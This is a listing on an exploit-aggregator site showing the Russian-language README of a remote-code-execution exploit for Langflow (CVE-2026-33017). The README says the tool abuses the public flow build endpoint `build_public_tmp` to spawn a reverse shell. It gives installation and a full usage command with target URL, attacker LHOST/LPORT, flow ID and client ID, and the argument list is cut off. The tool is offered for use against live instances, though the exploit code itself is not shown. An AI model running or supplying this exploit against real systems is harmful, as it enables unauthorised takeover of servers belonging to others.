Sploitus

CVE-2026-33017-Exploit

kitploit · 2026-09-03

Exploit Code

MARKDOWN33 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DIAMORPHINE666-CVE-2026-33017-EXPLOIT
# Fireflow RCE Exploit

Удаленное выполнение кода для Langflow через конечную точку `build_public_tmp`.  
Эксплуатация через конечную точку сборки публичного потока, которая выполняет обратную оболочку на целевой системе.

## Требования

  * Python 3.8+
  * Библиотека `httpx`



Установка:

root@kitploit:~
    
    
    pip install httpx
    

## Использование

root@kitploit:~
    
    
    python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>
    

### Аргументы

  * `-u, --url` : Базовый URL экземпляра Langflow (например, https://flow.example.com/)
  * `-l, --lhost` : Ваш IP-адрес для получения обратной оболочки